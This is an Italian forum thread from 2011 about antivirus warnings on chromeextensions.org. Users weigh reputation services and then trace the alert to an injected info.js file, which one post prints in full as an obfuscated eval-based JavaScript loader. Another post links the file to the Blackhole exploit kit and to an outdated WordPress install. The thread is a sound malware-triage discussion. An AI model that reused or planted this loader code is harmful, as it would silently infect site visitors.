MegaLab.it

Inviato: **mer giu 15, 2011 10:42 am**

ieri ho notato che il mio avast 6 free mi blocca la pagina http://www.chromeextensions.org come infetta ( trojan horse )
qualcuno di voi ha notato la stessa cosa ?
ma è un falso o ci si deve preoccupare ?
[grazie]

Inviato: **mer giu 15, 2011 10:56 am**

sondlive07 ha scritto:ieri ho notato che il mio avast 6 free mi blocca la pagina http://www.chromeextensions.org come infetta ( trojan horse )

Ti posso confermare che anche il mio Avast, oggi, blocca la pagina.

Inoltre anche Opera (tramite la protezione integrata di AVG) blocca il sito, quindi non credo che si tratti di un falso positivo.

Inviato: **mer giu 15, 2011 11:07 am**

Controlla il sito qui http://safeweb.norton.com/

Io l'ho fatto è norton safe web lo reputa sicuro.

Inviato: **mer giu 15, 2011 11:26 am**

ecco la diagnostica di google http://google.com/safebrowsing/diagnost ... sions.org/

puoi controllare anche qui http://www.unmaskparasites.com/ inserendo nell'aposito spazio l'indirizzo del sito da controllare senza http//, quindi inserendo solo www.chromeextensions.org

Il sito sembrerebbe pulito.

Inviato: **mer giu 15, 2011 12:08 pm**

Il problema del sito sono le estensioni non ufficiose che permette di installare : sono meno controllate rispetto al sito ufficiale,quindi prima o poi rischi di incappare in estensioni maligne (cosa che potrebbe già essere avvenuta,se i reputation rating lo segnalano come maligno).

Voci maligne in realtà dicono che Google si sia mossa verso siti simili perché distribuiscono estensioni fin troppo utili per gli utenti: vedi sul sito ufficiale se trovi una sola estensione per scaricare video da Youtube [sh]

Inviato: **mer giu 15, 2011 12:14 pm**

A corredo,la diagnostica WOT

http://www.mywot.com/en/scorecard/www.c ... nsions.org

Inviato: **mer giu 15, 2011 12:46 pm**

magari è un problema recente e quindi su WOT è presente ancora la vecchia classificazione... mi sembrerebbe strano che due servizi indipendenti lo classificano come trojan senza motivo (per altro è la prima volta che vedo la protezione di Opera in azione [:D]

)

Inviato: **mer giu 15, 2011 1:59 pm**

anche il controllo su virustotal ritiene sicuro il sito

Voci maligne in realtà dicono che Google si sia mossa verso siti simili perché distribuiscono estensioni fin troppo utili per gli utenti: vedi sul sito ufficiale se trovi una sola estensione per scaricare video da Youtube

questa è stata una delle prime cose che ho pensato ...................................

Inviato: **mer giu 15, 2011 3:46 pm**

Il presunto file infetto è questo

Codice: Seleziona tutto: http://www.chromeextensions.org/wp-content/themes/chrome-extensions/js/info.js

Secondo virurtotal http://www.virustotal.com/file-scan/rep ... 1308148698

Inviato: **mer giu 15, 2011 4:08 pm**

Codice: Seleziona tutto: el=document.createElement("input");el.setAttribute("value","ReferenceErr");try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.value+a.toString().substr(0,0);};var ar="me10sty>:n<)w2cv /l.zpbgi=;\"fhau(odr";var ar2="R136,-4,-76,68,-124,4,32,-16,56,-28,92,-44,-76,-16,124,-20,-68,56,16,28,-20,-120,4,60,-48,124,-84,44,16,-96,0,64,-52,36,0,16,36,20,-20,-64,84,-116,60,-64,56,12,8,-16,-12,-48,96,-112,-4,4,12,52,-52,-12,56,-56,32,32,28,-96,120,-28,-88,12,52,-52,4,4,48,-68,48,16,24,-16,8,32,-32,-20,-16,48,40,-116,96,-16,-92,56,52,-112,92,-4,24,-96,80,-88,52,48,28,-20,-120,4,84,44,8,-4,-132,136,-40,-88,52,-48,40,84,-8,-60,0,24,-60,56,8,-64,96,-68,-28,96,8,-136,12,80,-16,-76,24,12,28,28,16,28,-20,-120,4,24,80,-64,60]".replace(k.substr(0,1),'[');pau="urn eReferenceErr".replace(k,"val");e=Function("ret"+pau)();ar2=e(ar2);s="";var pos=0;for(i=0;i!=ar2.length;i++){e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');e('s+=ar.substr(pos,1)');} e(s);

Mi piacerebbe capire che accidenti farebbe un codice del genere [uhm]

Inviato: **mer giu 15, 2011 4:13 pm**

nuova analisi di virustotal sul sito

http://www.virustotal.com/url-scan/report.html?id=961cb119ea31ee2db6c7427810dbc8ba-1308143109

Inviato: **mer giu 15, 2011 4:14 pm**

Opera lo identifica come sito di Phishing [uhm]

Inviato: **mer giu 15, 2011 9:03 pm**

Vi linko questo sito moooolto interessante:
http://sitecheck.sucuri.net/scanner/
è un servizio on line che permette di effettuare la scansione di un sito alla ricerca di malware e phishing, fornisce moltissime informazioni, anche l'indirizzo ip che potrà servire per un'ulteriore verifica attraverso quest'altro sito:
http://www.ipvoid.com/
che ci farà sapere se tale indirizzo ip è sicuro attraverso diversi servizi online.

Da provare... [^]

Inviato: **gio giu 16, 2011 9:44 am**

Ecco il js reso più comprensibile:

http://pastebin.com/3XCrssBq

Inviato: **gio giu 16, 2011 2:05 pm**

Risolto il dilemma (almeno parzialmente).

Il file in questione sembra essere collegato con il kit di Exploit Blackhole che trai tanti siti bersaglio colpisce le versioni non aggiornate di Wordpress.

La versione di Wordpress del server è la 2.9.1 mentre la pù recente è la 3.1.3.

Per farsene un idea basta cercare su google porzioni dello script (ad esempio):

Codice: Seleziona tutto: e('pos+=parseInt(k.replace("Referen","0asd"))+ar2[i]/4');

Noterete che i risultati che ne vengono fuori sono tutti relativi a siti compromessi (da molti exploit), è possibile che l'infezione del sito sia avvenuta casualmente è che l'amministratore non se ne sia accorto.

Nel frattempo ho inviato il file in questione ad Avira che lo ha classificato come MALWARE e dal prossimo aggiornamento verrà riconosciuto come:

JS/Borak.se

http://analysis.avira.com/samples/details.php?uniqueid=CxCGZbGDjGHM5DvWW9Cny65CxbBNtMzU&incidentid=762681

Quindi da ora in poi prestate attenzione se decidete di navigare su questo sito [fischio]